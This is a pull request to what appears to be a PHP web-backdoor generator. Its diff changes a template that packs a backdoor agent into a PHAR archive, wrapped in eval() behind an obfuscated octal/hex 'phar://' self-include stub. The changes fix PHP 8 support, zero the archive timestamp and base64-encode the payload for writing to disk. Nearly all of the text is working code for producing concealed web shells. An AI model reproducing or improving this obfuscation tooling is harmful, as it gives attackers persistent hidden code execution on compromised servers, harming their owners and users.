### PR TITLE
Fix PHP8 support

### DIFF
--- a/bd/obfuscators/phar.tpl
+++ b/bd/obfuscators/phar.tpl
@@ -1,18 +1,18 @@
 <%!
 import io
 import zlib
+import base64
 import hashlib
 from datetime import datetime
 %><%
-agent = agent.strip(b'\n')
+clean_agent = agent.strip(b'\n')
 stub = b"""<?php include "\\160\\x68\\141\\x72\\72\\57\\57".basename(__FILE__)."\\57\\x78";__HALT_COMPILER(); ?>"""
 fname = b'x'
-f = b'<?php eval(\''+agent+b'\');'
+f = b'<?php eval(\''+clean_agent+b'\');'
 fenc = zlib.compress(f)[2:-4]
-flags = 0x00010000
+flags = 0x00011000
 
 output = io.BytesIO()
-
 output.write(stub)
 
 # Manifest
@@ -21,16 +21,14 @@ output.write(b'\0\0\0\0') # Placeholder for manifest length
 output.write((1).to_bytes(4, 'little'))
 output.write(b'\x11\x00') # Phar version
 output.write((flags).to_bytes(4, 'little'))
-alias_bytes = b''
-output.write(len(alias_bytes).to_bytes(4, 'little'))
-output.write(alias_bytes)
-output.write((0).to_bytes(4, 'little'))
+output.write((0).to_bytes(4, 'little')) # Alias
+output.write((0).to_bytes(4, 'little')) # Metadata
 
 # Entry manifest
 output.write(len(fname).to_bytes(4, 'little'))
 output.write(fname)
 output.write(len(f).to_bytes(4, 'little'))
-output.write(int(datetime.now().timestamp()).to_bytes(4, 'little'))
+output.write(int(0).to_bytes(4, 'little')) # Timestamp
 output.write(len(fenc).to_bytes(4, 'little'))
 output.write(zlib.crc32(f).to_bytes(4, 'little'))
 output.write((0o777 | 0x00001000).to_bytes(4, 'little'))
@@ -45,5 +43,5 @@ output.getbuffer()[s:t] = manifest_len.to_bytes(4, 'little')
 output.write(fenc)
 output.write(hashlib.sha1(output.getvalue()).digest())
 output.write((0x0002).to_bytes(4, 'little'))
-output.write(b'GBMB').decode('utf-8', 'replace')
-%>${output.encode('utf-8')}
+output.write(b'GBMB')
+%>b64:${base64.b64encode(output.getvalue()).decode('utf-8')}

--- a/core/generate.py
+++ b/core/generate.py
@@ -3,6 +3,7 @@ from mako.template import Template
 from core.weexceptions import FatalException
 from core import messages
 import os
+import base64
 
 def generate(password, obfuscator = 'obfusc1_php', agent = 'obfpost_php'):
 
@@ -42,8 +43,12 @@ def generate(password, obfuscator = 'obfusc1_php', agent = 'obfpost_php'):
 def save_generated(obfuscated, output):
 
     try:
-        with open(output, 'w') as genfile:
-            genfile.write(obfuscated)
+        if obfuscated[:4] == 'b64:':
+            with open(output, 'wb') as genfile:
+                genfile.write(base64.b64decode(obfuscated[4:]))
+        else:
+            with open(output, 'w') as genfile:
+                genfile.write(obfuscated)
     except Exception as e:
         raise FatalException(
             messages.generic.error_creating_file_s_s %


### PR DESCRIPTION
I messed up !
Mako template do not handle raw bytes very well, so now the payload is written b64 encoded by the template, and decoded before being written to output file.

Also the timestamp of the result Phar is now 0 (and not current time), and a few quirks were fixed.